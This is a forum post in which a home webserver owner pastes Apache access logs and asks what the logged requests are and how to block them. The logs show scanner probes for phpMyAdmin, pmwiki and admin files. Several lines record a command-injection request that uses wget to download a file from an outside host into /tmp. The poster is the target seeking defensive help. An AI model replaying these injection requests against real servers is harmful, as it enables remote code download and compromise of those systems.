Hello to all in this forum. And thank you for your good work so I have been able to put up a webserver. But obviously I did register, because I have a question. And here it comes:
I have been getting these attemps to my IP
Code:
210.34.10.68 - - [15/Dec/2011:03:00:41 +0200] "HEAD / HTTP/1.0" 302 0 "-" "-"
188.165.247.215 - - [15/Dec/2011:07:06:40 +0200] "HEAD / HTTP/1.0" 302 0 "-" "-"
67.228.187.116 - - [15/Dec/2011:09:06:21 +0200] "HEAD / HTTP/1.0" 302 0 "-" "-"
What are these?
And these are somekind of hacking attemps, right?
Code:
125.88.75.199 **.**.***.*** - [15/Dec/2011:18:11:49 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 345 "-" "ZmEu"
125.88.75.199 **.**.***.*** - [15/Dec/2011:18:11:49 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 345 "-" "ZmEu"
125.88.75.199 **.**.***.*** - [15/Dec/2011:18:11:55 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 345 "-" "ZmEu"
193.85.145.195 **.**.***.*** - [17/Dec/2011:13:37:54 +0200] "GET /cse/pmwiki.php HTTP/1.1" 200 418 "-" "-"
193.85.145.195 **.**.***.*** - [17/Dec/2011:13:37:54 +0200] "GET /info/pmwiki.php HTTP/1.1" 200 419 "-" "-"
193.85.145.195 **.**.***.*** - [17/Dec/2011:13:37:54 +0200] "GET /infowiki/pmwiki.php HTTP/1.1" 200 423 "-" "-"
188.138.11.56 **.**.***.*** - [25/Dec/2011:02:22:35 +0200] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/cgi-bin.txt%20http://freetunel.com/cgi-bin.txt HTTP/1.1" 200 586 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
188.138.11.56 **.**.***.*** - [25/Dec/2011:02:22:36 +0200] "GET //webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/cgi-bin.txt%20http://freetunel.com/cgi-bin.txt HTTP/1.1" 200 583 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
188.138.11.56 **.**.***.*** - [25/Dec/2011:02:22:36 +0200] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20http://freetunel.com/cgi-bin.txt HTTP/1.1" 200 547 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
How dangerous are these? Can I block them somehow?
And what the f**k is this?
Code:
61.250.80.133 **.**.***.*** - [21/Dec/2011:23:56:42 +0200] "GET /user/soapCaller.bs HTTP/1.1" 200 445 "-" "Morfeus Fucking Scanner"
I made my site SSL, thanks to wpte for instructions in this thread, blocked port 80 and after that I have get only couple attemps:
Code:
113.142.1.249 **.**.***.*** - [06/Jan/2012:11:01:34 +0200] "GET /admin/config.php HTTP/1.1" 200 436 "-" "Python-urllib/2.4"
94.24.41.200 **.**.***.*** - [08/Jan/2012:13:11:16 +0200] "GET /admin/cdr/counter.txt HTTP/1.1" 200 422 "-" "-"
Are these two same category than those above?
I want to open port 80 again, because google translate dosn't work on https. Can I forward from another port somehow? Earlier tried port 8081 and my PHP Fusion site didn't work (cookies?). So I'm asking is there something I can do those attemps?